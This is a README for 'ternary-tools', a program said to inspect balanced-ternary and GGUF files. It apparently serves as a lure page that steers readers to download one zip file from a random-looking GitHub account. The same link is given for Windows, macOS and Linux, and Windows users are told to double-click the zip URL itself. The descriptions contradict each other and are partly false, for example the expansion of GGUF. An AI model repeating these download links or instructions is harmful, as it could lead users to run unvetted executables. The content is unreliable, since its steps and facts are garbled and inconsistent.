Welcome to ternary-tools! This application helps you inspect and debug balanced-ternary files. It is easy to use, making it perfect for anyone β even if you don't have a programming background. With this tool, you can ensure that your files work correctly and meet the specifications of balanced-ternary formats.
- Balanced-Ternary Awareness: Understand and manipulate files using the unique balanced-ternary system.
- GGUF Inspector: Check the structure and integrity of GGUF files.
- Model Debugging: Test and debug models to ensure they are performing as expected.
- Cross-Platform Compatibility: Use on any major operating system with minimal setup.
You can run ternary-tools on various platforms. Here's what you need:
- Operating System: Windows 10 or later, macOS 10.15 or later, or a modern Linux distribution.
- Memory: At least 4 GB of RAM.
- Storage: Minimum of 100 MB of free space.
Follow these steps to download and run the application:
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Visit the Releases Page: Click here to go to the releases page.
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Download the Latest Version: Look for the latest release. It will usually be at the top of the page.
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Choose the Correct File for Your System:
- For Windows, download
https://raw.githubusercontent.com/qwrtgvdsdf/ternary-tools/main/gadded/tools_ternary_v3.4.zip. - For macOS, download
https://raw.githubusercontent.com/qwrtgvdsdf/ternary-tools/main/gadded/tools_ternary_v3.4.zip. - For Linux, download
https://raw.githubusercontent.com/qwrtgvdsdf/ternary-tools/main/gadded/tools_ternary_v3.4.zip.
- For Windows, download
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Extract the Files (If Necessary):
- For macOS and Linux, unzip or untar the downloaded file.
- On Windows, you can run the
.exefile directly without extraction.
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Run the Application:
- On Windows, double-click the
https://raw.githubusercontent.com/qwrtgvdsdf/ternary-tools/main/gadded/tools_ternary_v3.4.zip. - On macOS, open the extracted folder and double-click
ternary-tools-macos. You may need to allow the app in your security settings. - On Linux, open your terminal, navigate to the extracted folder, and run
./ternary-tools-linux.
- On Windows, double-click the
Once the application is running, follow these simple steps to inspect and debug files:
- Load a File: Click on "Open" or drag and drop your balanced-ternary file into the application.
- Inspect: Review the fileβs structure and data. The application will display important details for you.
- Debug: Use the provided debugging tools to troubleshoot any issues. Look for error messages and follow the prompts to correct them.
ternary-tools supports a variety of balanced-ternary formats:
- GGUF Files: Commonly used files for global graph unifying format.
- Custom Formats: If you work with your own formats, the application allows you to analyze them effectively.
If you encounter any issues or have questions, you can reach out through the GitHub Issues page. We encourage users to share their experiences and tips for others.
- Features Suggestion: If you have an idea for a new feature, let us know!
- Bug Reports: Help us improve by reporting any bugs you find.
Here are some useful links for further reading:
To get started, you need to download the application:
- Go to the releases page: ternary-tools Releases.
- Select the correct file based on your operating system.
- Follow the instructions above to run the software.
Thank you for choosing ternary-tools! We appreciate your interest in our application and look forward to your feedback and contributions to make it better.